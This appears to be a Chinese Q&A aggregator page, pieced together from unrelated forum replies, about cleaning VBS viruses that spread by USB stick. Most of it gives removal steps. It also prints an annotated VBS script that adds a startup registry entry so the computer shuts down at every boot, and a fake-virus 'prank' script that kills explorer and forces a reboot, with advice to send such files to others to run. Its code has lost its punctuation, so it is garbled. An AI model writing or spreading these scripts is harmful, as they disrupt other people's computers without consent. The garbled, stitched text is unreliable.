VBS病毒编写简单,但通过U盘传播是很有效的,很多人遇到的vbs病毒一般是movemenoregvbs,installervbs,helpervbs这种病毒,而且需要打开隐藏系统文件设置才能在U盘里看到,隐藏的时候是不知道已经感染病毒了,这种病毒一般感染电脑后会把你的电脑当做肉鸡挖矿使用,所以很多人都根本不能发现,所以我们需要定时用专用的工具来对U盘进行杀毒,从而判断电脑有没有感染一些恶意木马。
感染后的U盘表现:
该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里面的所有文件,在名为“WindowsServices”的目录下存放着三个病毒文件,文件名为:movemenoregvbs,installervbs,helpervbs。
感染路径:
U盘被感染后,插入新的电脑上,只要点击了U盘里的模仿你正常文件的快捷方式就触发感染到新电脑上,一般复制病毒到电脑%AppData%\WindowsServices目录下,然后添加开机启动,如果有新U盘插上就麻烦感染新的U盘。
一、手动清除方法:
1、先显示隐藏系统文件,打开任意一个文件夹,点击工具-文件夹选项-然后选择查看,取消勾选
隐藏受保护的 *** 作系统文件,隐藏文件和文件夹选择显示隐藏的文件。
2、找到三个文件所在的位置,U盘里的打开就能看到,直接删除,电脑系统里的在C:\Users\Administrator\AppData\Roaming\WindowsServices文件夹里,但不是每个电脑都是这个文件夹。C:\Users\(这里就用你们自己名称)\AppData\Roaming\WindowsServices\文件夹是用中文显示的,所以找不到的小伙伴,就直接复制路径,改成你们的用户名就行了。3、注意U盘要先拔出电脑,然后再删电脑里的这些病毒文件,WindowsServices里有三个文件movemenoregvbs,installervbs,helpervbs,删掉。
二、软件清除
U盘杀毒软件里清除vbs病毒的usbkiller工具,直接扫描电脑和U盘里所有的vbs病毒,清除所有VBS病毒,比手动 *** 作方便,手动适合无网络的时候使用。
可以看到扫描对方选择,内存,本地硬盘和移动存储就是U盘后,点击开始扫描等待扫描完成就发现vbs病毒全部列出且已经清除病毒的结果。
解决方法:
用杀毒软件,对u盘进行扫描。
(1)打开“”程序,点击“百宝箱”“新毒霸”“U盘卫士”项,用新毒霸的软件对u盘进行扫描、查杀。
(2)再打开的“金山U盘卫士”界面中,点击“全盘查杀”按钮。
你的点子低了
小红伞还可以呀
全盘安全模式检测
查杀
杀卟了
换杀毒软件
木马么》?
那下 木马清道夫吧
木马克星
木马清道夫
360
超级巡警
都寺杀木马的
还可以的
是特洛伊木马病毒。
杀毒办法:(可能金山已经帮你杀掉了吧)
重新启动电脑,自动检测完后, 按[F8]键(可以一直按到启动菜单出来为止), 选择安全模式(Safe Mode)进入Windows。)
控制面板--管理工具--服务--查找--Remote Reader Machine --启动类型--设置为已禁止--服务类型--设置为停止
显示隐藏文件
删除C:\WINNT\system32\ssmcexe
注意区别smss和ssmc
进程文件:smss或者smssexe
进程名称:session manager subsystem
描述:smssexe是微软windows *** 作系统的一部分。该进程调用对话管理子系统和负责 *** 作你系统的对话。这个程序对你系统的正常运行是非常重要的。注意:smssexe也可能是win32ladexa木马。该木马允许攻击者访问你的计算机,窃取密码和个人数据。请注意此进程所在的文件夹,正常的进程应该是在windows的system32和servicepackfiles\i386下面
祝你好运
哈哈,无聊简单的恶作剧VBS脚本,给你翻译一下吧,加了一些注释,你一看就会明白。
Dim HFWsr : Dim HFWfk : Dim HFWfw : Dim FwriteText : Dim HFWfpHFWfp="C:\HFWkillvbs" '这里是先定义一个恶作剧脚本的文件名,赋值给一变量方便后面调用
set HFWsr=CreateObject("wscriptshell") '创建Wscript对象
set HFWfk=CreateObject("ScriptingFileSystemObject") '这个对象用于下面的文件 *** 作
Set HFWfw = HFWfkCreateTextFile(HFWfp, true, false) '这里开始就是准备创建新的恶作剧脚本HFWkillvbs了
HFWsrRegwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KILLHFW","C:\HFWKILLVBS","REG_SZ" '这里是设置了开机自动运行 C盘根目录下由本程序创建的VBS程序
FwriteText = "dim HFWkill:set HFWkill=CreateObject(""Wscriptshell""):HFWkillrun ""shutdown -s -t 0 -f"",0" '它最主要是这段关机代码写入了这个新建的VBS文件
HFWfwwrite FwriteText:HFWfwclose '创建完毕
HFWsrrun "attrib +h +r +s c:\hfwkillvbs",0 '设置为此恶作剧文件为隐藏文件只读文件系统文件
msgbox "o(∩_∩)! I LOVE YOU ! 你挂了哈哈哈",0,"HFW" '这里是得意地向你表示它已得逞
HFWsrrun "shutdown -s -t 0 -f", 0 '这里是先关你一次机,接下来你一开机它就关机了,就是这么个简单小恶作剧脚本!
万一已“中毒”,则进入安全模式,在运行里输入“RegEdit” 打开注册表,然后把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\下面的“KILLHFW”这项删除即可。顺便把C盘根目录下的HFWKILLVBS文件也删除掉最好,当然要删除这个文件要先设置显示隐藏文件系统文件。若熟悉DOS,那么在CMD窗口里输入Del c:\HFWKILLVBS 也行
这个是由于你之前中了暴风一号这个病毒,需要对系统进行修复。
百度搜索一下金山U盘专杀这个软件,可以很好的处理这个暴风病毒同时修复病毒造成的破坏,之后根据提示下载金山网盾进行其他病毒的处理,因为一般你还会同时中了其他病毒。
新建一个TXT文件,打开,把整人代码放进去,保存。然后把文件扩展名改成VBS,发送给别人,运行,就能整人了。
比如:
gsh=msgbox ("已经准备好格式化,准备开始。",vbyesno)
set s=createobject("wscriptshell")
wscriptsleep 1000
msgbox "开始格式化…… 哈哈!吓晕了吧,骗你的~"
wscriptsleep 1000
wscriptsleep 1000100
msgbox "windows发现一重要更新,将自动下载。"
wscriptsleep 3000
msgbox "系统检测到WINDOWS更新中捆绑有不明插件SXSexe,是否对其扫描?",vbyesno
wscriptsleep 1000
msgbox "文件名 SXSexe"+CHR(13)+"发行者 田间的菜鸟 "+chr(13)+"安全评级 高危"+chr(13)+"建议 直接删除"+chr(13)+"病毒类型:木马",,"windows扫描附件"
msgbox "是否阻止其安装?",vbyesno
wscriptsleep 3000
msgbox "阻止失败!请检查防火墙是否开启!"
wscriptsleep 5000
msgbox "正在尝试强行删除…"
wscriptsleep 5000
msgbox "失败!"
wscriptsleep 5000
msgbox "您的电脑已陷入危险之中,请赶快扫描病毒!"
wscriptsleep 10000
ssendkeys "% n"
srun "taskkill /im exe"
ssendkeys "% n"
srun "taskkill /im explorerexe /f"
ssendkeys "% n"
ssendkeys "% n"
ssendkeys "% n"
ssendkeys "% n"
ssendkeys "% n"
ssendkeys "% n"
ssendkeys "% n"
msgbox "你好啊!"
wscriptsleep 3000
msgbox "很高兴见到你!"
wscriptsleep 3000
msgbox "您的电脑可能已经感染病毒!",,"WINDOWS防火墙警告"
wscriptsleep 3000
msgbox "我控制你的电脑了!"
wscriptsleep 3000
msgbox "不信?那我给你关机看看~"
srun "shutdown -r -t 120"
msgbox "信了吧!"
msgbox "帮你解除关机……"
srun "shutdown -a"
msgbox "再给你打开记事本写封信,劝你最好别动,要不然会引起系统混乱~"
srun "notepad"
wscriptsleep 3000
ssendkeys "Hello, I'm sorry I control your computer,"
wscriptsleep 3000
ssendkeys " but the virus is false in, "
wscriptsleep 3000
ssendkeys "only a joke, "
wscriptsleep 3000
ssendkeys "please rest assured! "
wscriptsleep 3000
ssendkeys "I no longer next "
wscriptsleep 3000
ssendkeys "time so the whole you!"
wscriptsleep 3000
ssendkeys" Goodbye!"
ssendkeys"{enter}"
ssendkeys"END"
wscriptsleep 1000
ssendkeys"%{F4}"
msgbox "提示:刚才的“病毒”是假的,只不过是吓你玩玩~"
srun "explorer"
这个整人程序,既不会关机,也不会对电脑有伤害,就是有点烦。
VBScript(Microsoft Visual Basic Script Editon),微软公司可视化BASIC脚本版) 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言。进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是写的程序不需要编译成exe,,而是直接给用户发送vbs的源程序, 用户就能执行了。
以上就是关于U盘中病毒,病毒后缀是vbs,如何清除病毒全部的内容,包括:U盘中病毒,病毒后缀是vbs,如何清除病毒、U盘中了vbs病毒怎么办、为什么总提示我感染vbs和ftp.exe病毒啊等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)